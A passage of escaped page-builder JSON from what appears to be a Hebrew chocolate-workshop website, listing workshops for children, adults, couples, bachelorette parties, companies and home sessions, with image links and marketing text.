\\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc 